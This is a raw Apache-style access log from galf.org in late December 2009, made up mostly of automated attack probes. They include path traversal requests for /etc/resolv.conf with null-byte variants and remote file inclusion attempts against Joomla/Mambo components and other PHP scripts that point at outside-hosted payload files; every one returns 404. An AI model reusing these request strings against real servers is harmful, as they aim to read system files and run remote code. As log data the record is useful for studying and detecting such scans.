208.76.107.242 - - [27/Dec/2009:23:34:28 -0800] "GET /logs/access_090615.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:34:29 -0800] "GET /logs/access_090615.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:34:31 -0800] "GET /logs/access_090824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:34:31 -0800] "GET /logs/access_090824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:34:53 -0800] "GET /logs/access_090622.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:34:53 -0800] "GET /logs/access_090622.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:36:03 -0800] "GET /logs/access_090817.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:36:04 -0800] "GET /logs/access_090817.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:36:07 -0800] "GET /logs/access_090824.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:23:36:07 -0800] "GET /logs/access_090824.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
88.131.106.21 - - [27/Dec/2009:23:36:34 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.21 - - [27/Dec/2009:23:36:38 -0800] "GET /logs/?D=D HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
65.55.207.72 - - [27/Dec/2009:23:52:07 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.37.161 - - [27/Dec/2009:23:52:58 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.211.179.103 - - [28/Dec/2009:00:06:02 -0800] "GET /logs/access_090629.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search?ei=UTF-8&vst=0&vm=r&fr=yfp-t-832&p=dog+and+%2Bgalf+video&fr2=sp-qrw-orig-top&norw=1&vst=0&vm=r" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Creative AutoUpdate v1.10.10)" "www.galf.org"
89.211.179.103 - - [28/Dec/2009:00:07:06 -0800] "GET /logs/access_090629.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geu68iZzhLbUIAtypXNyoA?p=dog+galf+sex&fr2=sb-top&fr=yfp-t-832&vm=r&sao=0&vst=0&vm=r" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Creative AutoUpdate v1.10.10)" "www.galf.org"
61.47.7.71 - - [28/Dec/2009:00:08:38 -0800] "GET /logs////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [28/Dec/2009:00:08:38 -0800] "GET ///appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [28/Dec/2009:00:08:58 -0800] "GET /logs/access_090831.log%20%20////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:00:09:17 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:00:09:18 -0800] "GET /logs/access.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:00:09:18 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.80.193.54 - - [28/Dec/2009:00:09:22 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; Creative ZENcast v1.02.08)" "www.galf.org"
61.47.7.71 - - [28/Dec/2009:00:09:38 -0800] "GET /logs/access.log%20%20////appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:10:27 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:10:27 -0800] "GET /logs/access_090622.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:10:27 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:10:38 -0800] "GET /logs/access_090706.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:11:58 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:11:58 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:11:58 -0800] "GET /logs/access_090622.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.1.59 - - [28/Dec/2009:00:12:09 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:12:12 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.93 - - [28/Dec/2009:00:12:43 -0800] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /logs/access_090921.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [28/Dec/2009:00:13:00 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:00:13:26 -0800] "GET /logs/access.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:06 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:06 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:06 -0800] "GET /logs/access.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:27 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:27 -0800] "GET /logs/access.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:27 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /logs/access.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /logs/access.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:00:15:40 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:00:16:56 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:00:16:56 -0800] "GET /logs/access_091221.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:00:16:56 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:00 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:00 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:00 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:38 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:38 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:38 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:47 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:47 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:47 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:53 -0800] "GET /error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:53 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:00:19:53 -0800] "GET /logs/error.php?dir=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:31 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:31 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:31 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:32 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:32 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:32 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:59 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:59 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:22:59 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:03 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:03 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:03 -0800] "GET /logs/access_091109.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:21 -0800] "GET /logs/access_091019.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:23 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:23 -0800] "GET /logs/access_091109.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:23 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:24 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:26 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:31 -0800] "GET /logs/access_091019.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:00:23:36 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:00:26:06 -0800] "GET /logs/access.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:00:26:16 -0800] "GET /logs/access_091221.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:37 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:40 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:40 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:26:40 -0800] "GET /logs/access_091116.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:14 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:21 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:22 -0800] "GET /logs/access_090914.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:34 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:34 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:34 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:35 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:35 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:35 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:36 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:36 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:27:36 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:28:29 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:28:33 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [28/Dec/2009:00:28:40 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://cheermeister.com//moodle//files/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:29:35 -0800] "GET /logs/access.log%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:29:35 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:29:35 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:31:20 -0800] "GET /components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:07 -0800] "GET /logs/access_091123.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
